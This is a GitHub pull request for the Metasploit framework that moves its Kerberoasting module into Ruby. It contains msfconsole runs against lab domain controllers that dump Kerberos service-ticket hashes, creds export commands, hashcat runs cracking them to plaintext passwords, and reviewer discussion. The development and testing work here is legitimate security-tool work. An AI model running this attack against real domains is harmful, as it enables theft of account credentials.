Skip to content

Ruby kerberoasting #20175

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 8 commits into from
May 16, 2025
Merged

Ruby kerberoasting #20175

merged 8 commits into from
May 16, 2025

Conversation

smashery
Copy link
Contributor

@smashery smashery commented May 13, 2025
edited by smcintyre-r7
Loading

This moves the kerberoasting (get_user_spns) module into Ruby-land. More or less feature-parity.

Requires rapid7/metasploit-credential#190

Verification

  • Start msfconsole
  • use auxiliary/gather/kerberoast
  • run rhost=<host> domain=<domain> password=<pass> username=<user>
  • run rhost=<host> domain=<domain> password=<pass> username=<user> target_user=<target user>
  • Verify it outputs crackable values, which do actually crack in hashcat/JTR, for AES256, AES128 and RC4
  • Verify it works when targeting a specific user
  • Verify the hashes are stored in the DB, and are retrievable with the creds commands output by the module
  • Verify it retrieves all kerberoastable users if no target user is provided
  • Verify it works with various hash types
  • Verify It doesn't crash if the user isn't valid/has no SPN

Demo

msf6 auxiliary(gather/kerberoast) > run rhost=20.248.208.9 domain=msf.local password=AzureTesting12345 username=AzureAdmin
[*] Running module against 20.248.208.9

[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 20.248.208.9:88 - Received a valid TGS-Response
[*] 20.248.208.9:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513200438_default_20.248.208.9_mit.kerberos.cca_184125.bin
[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 20.248.208.9:88 - Received a valid TGS-Response
[*] 20.248.208.9:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513200439_default_20.248.208.9_mit.kerberos.cca_824882.bin

[+] Query returned 2 results.
[+] Success:
$krb5tgs$23$*kerber.roastable$MSF.LOCAL$http/abc2.msf.local*$c654f1c2389c9597bfadfe0ca0c5aa89$845c...
$krb5tgs$17$low.admin$MSF.LOCAL$*http/abc.msf.local*$ed6591594426682c972be463$a011...
[!] NOTE: Multiple encryption types returned - will require separate cracking runs for each type.
[*] To obtain the crackable values for a praticular type, run `creds`:
[*] creds -t krb5tgs-rc4 -O 20.248.208.9 -o <outfile.(jtr|hcat)>
[*] creds -t krb5tgs-aes128 -O 20.248.208.9 -o <outfile.(jtr|hcat)>
[*] Auxiliary module execution completed

msf6 auxiliary(gather/kerberoast) > creds -t krb5tgs-rc4 -O 20.248.208.9 -o /tmp/rc4.hcat
[*] Wrote creds to /tmp/rc4.hcat
msf6 auxiliary(gather/kerberoast) > creds -t krb5tgs-aes128 -O 20.248.208.9 -o /tmp/aes128.hcat
[*] Wrote creds to /tmp/aes128.hcat

smash@hackbox:~/share/metasploit-framework$ hashcat -m 19600 /tmp/aes128.hcat /tmp/wordlist
hashcat (v6.2.6) starting

...

$krb5tgs$17$low.admin$MSF.LOCAL$ed6591594426682c972be463$a011...:Pass123$

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 19600 (Kerberos 5, etype 17, TGS-REP)
Hash.Target......: $krb5tgs$17$low.admin$MSF.LOCAL$ed6591594426682c972...57ea66

smash@hackbox:~/share/metasploit-framework$ hashcat -m 13100 /tmp/rc4.hcat /tmp/wordlist                                                                                                                                                                                                                                                                                                  hashcat (v6.2.6) starting

...

$krb5tgs$23$*kerber.roastable$MSF.LOCAL$http/abc2.msf.local*$c654f1c2389c9597bfadfe0ca0c5aa89$845c...:Pass123$

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*kerber.roastable$MSF.LOCAL$http/abc2.m...e658b5

@smashery smashery marked this pull request as ready for review May 13, 2025 10:09
@smashery smashery mentioned this pull request May 13, 2025
Draft
2 tasks
@smcintyre-r7 smcintyre-r7 self-assigned this May 13, 2025
@smcintyre-r7 smcintyre-r7 moved this to In Progress in Metasploit Kanban May 13, 2025
smcintyre-r7
smcintyre-r7 requested changes May 14, 2025
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Confirmed it's working with a session and a direct connection. I was also able to pull RC4 and AES256 hashes.

msf6 auxiliary(gather/kerberoast) > show options 

Module options (auxiliary/gather/kerberoast):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   DomainControllerRhost                   no        The resolvable rhost for the Domain Controller
   Rhostname                               no        The domain controller's hostname
   SSL                    false            no        Enable SSL on the LDAP connection
   TARGET_USER                             no        Specific user to kerberoast
   Timeout                10               yes       The TCP timeout to establish Kerberos connection and read data


   Used when connecting to LDAP over an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LDAPDomain    msflab.local     no        The domain to authenticate to
   LDAPPassword  Password1!       no        The password to authenticate with
   LDAPUsername  smcintyre        no        The username to authenticate with
   RHOSTS                         yes       The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         389              no        The target port


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/kerberoast) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf6 auxiliary(gather/kerberoast) > run RHOSTS=192.168.159.10
[*] Running module against 192.168.159.10

[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:389 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250514172614_default_192.168.159.10_mit.kerberos.cca_890120.bin

[+] Query returned 1 result.
[+] Success: 
$krb5tgs$18$roastme$MSFLAB.LOCAL$*HTTP/testserver.msflab.local*$c24abd74505066ff28e51361$60610606e89799b60b5a3f4605d8ac310004ca5f538b2a6462d6d821ed6ac81539f471a32dc9963212263aff37104c006d3ae42edb51b5f37a531ea3bc90767d81ee68b2e44390a9297fd615b337c854fb6883efacfaa456e5bae01c305b59bd4f1f83227f67c1d6855da9f342088f916c8f43e2fb0901fa726d134f141d4353143165db192e5870043009f4c0e2bc0ee4e02b36321d0ef07bcf3cd7f623edcf570538d04eb189883967973b1d3d464769a2b804a8db624c215864419e0c0cc8824b7d34e0e9569d2db5ce5445c57a403d08a7db6ae7fa9b76fd9eebc8fac544a684085934f03b2075a98e9e68ede9b508f6f1f812b9858d8924612d5e94a755740a57e39ecb871180fe5f5b953139a703049d01b077cdbaf39d98d5256ea1389015760fb7b80333c9c2b67af0ba06f56a43a400c0635009b33186b76262da4352b8d3f655e370cff74589e6172565f8c52353bb543f783b34000ac28efeed359abb843fedb2041abb7ebed372abf89f4daece850ef87be3400e495002fba5d757bbee05f2706271f7eadd3f63c8d2e735a5c550e10a7222556e2b046b3b63490e9d065b00f3aeaa3f9fa47e940a0ea161fd5ede715e7ea2f76d4daa8775caa9fae545ef1a46074e9f12e78ef1ea21604516186db3784764fe4742a3fdc3f9ca72ac6dd324f96ac8c112e976870ada0ca4a67ab0da65434e4b4b68fedf0cbe2d99b6f17f2fce0e1cee7b2c0b38851a216d73d225b7cc1b272639f75b8b490d6677b5c280e875d5367da9d836b957a533b140aee3dfc4374cd1fe2d61308e76cf0926b203348f5009c37ef3e42b280faa52850ea7dc75afcb88ce6c02876cc6dd3ed36a62cf7d2e727454f7d69ad080937903786a958e0692daa70f2d41b83c17c7495b514df8d1e27657893d05d49cca8b5ba74e8612acdbb0e030f9e306d54082332415bc3ba8eca7b2272cc1687c65a713b12e1d540aa731d70d1717ff629d03c5b21315d8aa794c4054b9438b3c92b0832947a74da07d358c1e6910b319673b4b7068adf3a4366a51be356064db2e59c97014d0a52948bc6cab4bd025bceaa3edd81f306262304350a38bb0ffc348548d573145e147866c11e8f02f998b9bd79d22cc9786ca92928f1800733f53a6b20221416cb2c42aa79b1cb1b9007943af2634b1bd42455a57ff1f555133e78e7c7e5b064cbd1b0d561e3d9d188b67ed681ad7c004188f9a85d5cede247adbf504dd5a5d0e4f2708be8ea11848ec33b212ffbd4c85a6426dc00047a2b5668b19ccd300d3833e1411373116e6b9ca8324533a3e72a3485f9c5884bef9fa56db2ee501df5e047692890762135795f6643b86b30b1d95ee2d32262b2153de152e559586d6c10c5f401c3b529ffd9e1d46fa456051adf0a730d8240736ff98673e37afe071038a9dabc1a5bccfaceea3b59866481e7dfde9a763247a1b76bbf9e07a2337158cb2695fdfab594325481159d106991db81d4408f2abc8872a7a7b85e644502734a953fe00181e8272717e044aad704c5511434a2d4ac439ef7de2b6b967780751e601985980d594660713
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) > run RHOSTS=192.168.159.10 SESSION=1
[*] Running module against 192.168.159.10

[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250514172618_default_192.168.159.10_mit.kerberos.cca_059604.bin

[+] Query returned 1 result.
[+] Success: 
$krb5tgs$18$roastme$MSFLAB.LOCAL$*HTTP/testserver.msflab.local*$01c9bbecd189554107840045$0eb2377365b2ac9ac56f29a4fa24513f19cb4891007c19d3acd93dfd1f9f06f5050b153bf7df487b34b5ddd70fe8db463094b76f3a1cecbab085ca58e4cda2a07b225c42a0d488f5b7dc9625afbe3576036627ec8938811d85ee334e206b8e0edb4cf56728b976d099c82a6949e963e19e5d789f0aecc927cbd81f87b3449ffaa593a42028ac2625e48c44c452b297e7b95dde252bbbb274cada5bc5fcca3a18756f3fe5b4ea24188e31f59870df4991e2211dbc2a5913f8a444291c195fe5f704077cd66b97720cf6cb8e468efd702dedddc4cd9a947603e177f10a55a59641eac59e792d90a77f1ac34af4f130dfa1106a7c72e8aa99dc84dcb96762593401a6d9ede528f333bcb0c54a3ee150a015103bffb89c3885f47fa690f6fe70310718bc5050a981f9e414bd04b4131781f18e76107cdb66100db1dfee32b59f614fab959597e41e4c884bfb38232598a8cf64efb71630fcdcc7c70a383bc36723c7959aa77ed55ade5829eedb35277fa34ac7250ebf641e3c35e4f9d7a2efd35b6a8cfc8dcb639a858dd04dfdef144022ab730019905c4d231857e506a4868e0ae9e12bb329e6ff09c0b56eda34c8748e21138fa65e5c924ab50b2617dbfa03c913c2aeeb3c26d31711de2bedf2d9c123f004f80f85b98ceec4ccb6d3f7d68840ea5ae73f50bee05aed1122c347d7941d11b77e0a979788b1bd55063ac9951069141c9abbc57bb8c7b5bef0366ed8cd56ceaf734e22f7e7f9d18ca4eb5f13da5200905f13d41a091ccb897c173eb662b10adde01a577b77c13fa881627e5d749fb64c5d8e31e02a18c0c042f59b968735afa1710b337b800f2a6e1dcfd3e6c611c2ddc7726d26f0153a04900da3bdbc6d3526b6551fcea9c624cec93965d471ee17ac67b0185540c59633e9172c199e6b5e8085b9c4c487ab33f15bafaa29b38e519be82f90d085e1d756ef1f92090ff34478315632919cb03e4512257e7c05202de8cd4ee573aca687ac9eed5676111eeee9b10f4ca009f102bb9f88467e9eaa9fc255cefaa6ebc1174b62d7e570ef78b2eb87a2b490791abf24c7f0bfe2e5726bbd1d296944f3b49cef353d427405530ca80bba4179dd04ec1a6cf570f8265088679f15b8e09d36c0fef89b9815d2cfe2822cebd40348161803577cec5152cb16bf3e6babd4e2c195e76f29af641d1585a796631df9f8184a8a8d3312db3b8f26b538efd619332572a2b8d43944f354a904a7048eaa8e541be6fccd93d06f349a8bf95f874453bb99da520410ac2926997d2a2484170e376a37e3200493d51376cc573736248e079f01cd99d415390139bb32028604129653a0ff904928d1b159ebcae6619d09d653ced130f03266cfd3df9b30ac2414b1d3ab148508ed49865804bb1008e93bef940b52f0c7972d00648a112d94c1ffbb558a27fdae6e78952f4b94ef89dc06e3e7dd31159e28c6f2a9717b95669fef4c11da2452ddb3f901d9ce8fb8f7af2a5189f4643eaac28aa782e494cd610215eb0923860294579debfaf5880ee54dbe4ad148cf071287da408b6c957953bb84b3b583f06d180af9
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) >

@github-project-automation github-project-automation bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban May 14, 2025
sjanusz-r7
sjanusz-r7 reviewed May 15, 2025
View reviewed changes
Copy link
Contributor

@sjanusz-r7 sjanusz-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would you be able to write some tests for this PR?

modules/auxiliary/gather/kerberoast.rb
end
end
if hashes.empty?
return
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would it make sense to log a message here that we got no hashes, or will there always be something logged in other places?
My reasoning being:

  • User runs the run method
  • We experience no errors
  • hashes remains empty
  • User gets no output in their console

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The #run_builtin_ldap_query method does print that no results were found for the LDAP filter so something would be printed. It probably makes sense to log something here though for clarity that not finding any entries means we found no hashes and in case the #run_builtin_ldap_query method changes. I'll add this myself since I think it's easy enough and should get this unblocked.

modules/auxiliary/gather/kerberoast.rb
tgs_options
)

format_tgs_rep_to_john_hash(tgs_ticket, roasted)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Should we be defaulting the roast method to return JTR-formatted hashes? Seems like a separate concern. e.g. instead, roast could return the TGS Ticket which then could be converted to a JTR-formatted hash later as seen in the creds command.

smcintyre-r7
smcintyre-r7 approved these changes May 15, 2025
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm going to push one more commit to add some error handling and then I'll land this once the tests pass.

Testing Output 
msf6 auxiliary(gather/kerberoast) > run
[*] Running module against 192.168.159.11
[-] Auxiliary aborted due to failure: unreachable: The host (192.168.159.11:389) was unreachable.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) > set RHOST 192.168.159.10
RHOST => 192.168.159.10
msf6 auxiliary(gather/kerberoast) > run
msf6 auxiliary(gather/kerberoast) > run
[*] Running module against 192.168.159.10
[-] Auxiliary aborted due to failure: bad-config: User aliddle not found
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) > set TARGET_USER roastme
TARGET_USER => roastme
msf6 auxiliary(gather/kerberoast) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:389 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250515133115_default_192.168.159.10_mit.kerberos.cca_203581.bin
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:389 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250515133115_default_192.168.159.10_mit.kerberos.cca_265894.bin
[+] Success: 
$krb5tgs$18$roastme$MSFLAB.LOCAL$*HTTP/testserver.msflab.local*$446534f2d199edf6ffdf94e7$77d83462bb8cc7010fc97242ac35a61cc018d2022aea24b67b8cb0788956a11c80fe282eebeddbb1fb64bd06652674142b700f2fddf9fd7f5043a228826784b3f8df8f917864df7c10362d2138fb60ae256951aeb4f658a874413481c34c357c39489df0b1c6d2d930ffc4aafb8d012ee9666969fe895965f1e85fb9b71eb9bb3401d8628cb7053fa89ebd369b15a392e287241cf4ebe8346399c30ac26f395d72462722e9fa1c4742620e8a60585fed468fccf0541813b8e9570334459f41bc7dafc54d35da4930f370f85d2df647e269782841aea3a95d92db23016c999ae9fa3c6a19629744db0321c3790957bd816ac786b1624cd28502ad5e9d041c4cae4c498064adbf36eef457562ae6177b6800dca7fddbd131fb229e587ac2e9de72a7aadab158e22bc981ea22cd897cdf9cf7fe2c70b8b9ba78ecaea575ebd5ae1306ff048e119c6bf8a73d28341485e29a1715a5bca1b2d7a22869a0664cdf06a760814650374353e21f8978e659c890eace74db549e457f337e2db8a729e143f44da5a2ca9ac3480c53cb611ba27417db0fba1d8cb74e705ee24e6467f9cfe119c7c9598999e0e3a3bd3a29f71173b0bbcfed6bbf2f955cd3dc045fd9abc4dd369062394ae568772a3c8ef7eec74f78f4eeaf54cb5d8df625b17fc50bb82e72898d88b2e0329387a1258394233cc0083f27bcded43476004c469e547ef69d865b37efd56bdf5c82d82088ddaef6d03d731aed0db4951094f4d41c8c8beae438cecff06922802b9c3c52c707cca04c47a7b908bc8386378d1c553778b817a9045214ddba811e31923e3a31bb53fb48a5a04602d091d79beafb9e10ffcf35172662f0868834b129dfcf2eea892a4ddc48298047b6d676824ae7a6cbf80a2de2705233ef3e4ddb2e9e55f8190947ce2e98fce1103b5633af568af85330449b7329b405fbf4d8be021aef9295ac18fac3563c0c24f07d9fa8d87318a34e98d52d932a2f8cc1eccbfdcccb334acfe30b66195922e6fab0e3c8def22f13db58b8132090bbb9b9b334f6fbaa08e610ec526354ef069a7cbc8e2606b97516a36b70ec80c1159565fa911c53351fdb4843277d1458528c9a25368009331245768f9f71423c9567383a3d222cea8f57f0bf8f5a742482e8ab1c481daf9e3698599d53983a8ab74014a01911223ac5af52be89a66ce006f9a34491f6a99c5e90f4f03c99da84840439cb29b16f36a4d84132dcc027181dced3a48debf37f7734f587a7e54b767648bd632ca6a1226b4cae02b410d8f730b5e2321b1426306b3642c0cb506a2fdee19096b204b98817abfab09b8c964a9c7303454df073252c64c7883d482fbbe91da3b633b9f853fca22260137594be640cbec9b138a8923c5a72452157c2e13666c054031cf166c7eddb819f48eca1fbc51c6bc470f9802943373041eeef4523fea86d25348dc78b976dc740d6f29f4eef7668b444092f4c23d0ae8bea33f3104cd3753dc80278125635badc5ab321a6de09c46aca52c5bcf9da94049158972115e55cbd82352e3d26a5a9bc545a64db26696db725bac97e2d92385cf5
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) > set TARGET_USER ""
TARGET_USER => 
msf6 auxiliary(gather/kerberoast) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:389 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250515133121_default_192.168.159.10_mit.kerberos.cca_545644.bin
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:389 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20250515133121_default_192.168.159.10_mit.kerberos.cca_920390.bin
[+] Success: 
$krb5tgs$18$$MSFLAB.LOCAL$*HTTP/testserver.msflab.local*$942545e0ebeef373f698241e$48066029438d4048c7e50ffee7fa96fc32e5e5845aae1dd26e280b8f76f5bafe8867bd7dddc28cc0d51b5c51ecea5934c9680f408fddef6fc549ba60ac1f1fc9efca6fad7335f92673367fd59a67650092879ea9788b91963a050950fc57ffd306e4d3d4525f2b0733f9e1d9f63bb959f8b86defa46e64dd2fae4752a7e8cb987f61662763359dc84c565205b267c6c6279a053f4564b63d108e8f8a97965930fead015c8b1311004dcf542f084f8230d0a92339ec771cbf8b32d26cb0d2e3d3dfdd669f4c44eb42fd6220300d15b6e38c8ce0fe34a4aeaf1eaa81cb171a7c138db231e62d7c27a03c7f5b302038fd1e009af2647236427119adfb784f710b685d999027956552213774c68597bfc8b79446903d3a2b5e2a65f9b975aac522d1409dd8179b5baf396320587d6b3caeb32221511547a236a4bc8781126816bd852e25079b84e5199bc1b81078c9940d37bead8daf756c20bdde993e3ccdc6cdeee4bdf7367f8a459537513b1bb99aebac7a7a151aef9712111a2f2c886d868ff159d6e8ad51194801df428e5044404a923d9fe5952655aaf64af2ba14272d1223086485d6b5a2782ef6f436c0827785b11fc8a2b16d2f589c65663562cd9d64589ba4d8c7096d0997dbe027e9665cfd8abfdeba018f4faa30957c63430f261196f2708b3ad5a3fc6dc2cb320ed084fba2d6123acd2953ad43efa09c8493b3c5a55a34f06357b9d2c9c8c2e399f63a9e93096783c922a8c163f5998f16f288e842493b004113edf67b322afc40bb1d294c2ba9a3a2b8fa385d0730ae51630f9a916f17972dfc97dd948905cafc3d4a0db37a58ec8191abe290cf0b43cb99d9c7932976703d77cbd3ef5a37b9a85571a26b1bae7002ede1668d68aad569dc0fcb4a781264298ee54446de45eee085cb563b0b4bb59130f921030c595d09493f1d9c68444f15c06229ef428055f3a6a8f8a03077e776cc59a9d5964bdfea00ea11d15821388a0a37e860917e28eb58ab98c6367393c1c31df55b5c837dfbb02de99fe66d53a6f257b99c020e80640dda98807c650eddca0f0a910e8b838cd3cbdfd47d401c1d1d682af4073ba7f390edf1f42e8ec572e0300f00d88a695bb1977b5889d771397c7e0f5e70cefcc639e146bf157dc72f367f84dcdc482bdf06743085eec9da68ecbdcf8a1bc1d9c9e98d8c8eb8da523bdf9d34d137837443c4aaea94c8825d42056510a4e1168b4461fd7251b248eb1a75aacf52090884ce6e0e594eca4266fd99ce7f5c7cae1227883469b5d313cbdcc1f87d08c1f57488ba65cd7e3c4f765904e232c26c93049d7881313e0838436be1e18a52dd3fa166eab518bdabb57be3c366ca2f67dcc16da496c4b5160f2e82b324d01ac53fd067cf54fb6c24f6761126b4ab0ffecd73335089a51fda974252d47d70bda9afe830530839ed7e37ac81388431f9c6f3553660ab915d460440566e6b7d5bf194ba646eac979046805d46aef1e7e78de05807d732e924ebb6fc31bba94ac6dea9ec2b5a2f1b3e393c88cdf4da3f7a8bff11e86b9c09a962d652a1689d17775036a93d0e40
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberoast) >

@sjanusz-r7 you're right about us needing tests for this but I don't want to block on that here. Instead I'll work on writing them myself this afternoon.

@github-project-automation github-project-automation bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban May 15, 2025
@smcintyre-r7 smcintyre-r7 merged commit 57c6904 into rapid7:master May 16, 2025
50 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban May 16, 2025
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds a native Metasploit module for performing Kerberoast attacks. With the native module, users will no longer need to have Python or additional Python libraries in order to leverage the attack technique.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@sjanusz-r7 sjanusz-r7 sjanusz-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
None yet
Projects
Metasploit Kanban
Status: Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@smashery @smcintyre-r7 @bcoles @sjanusz-r7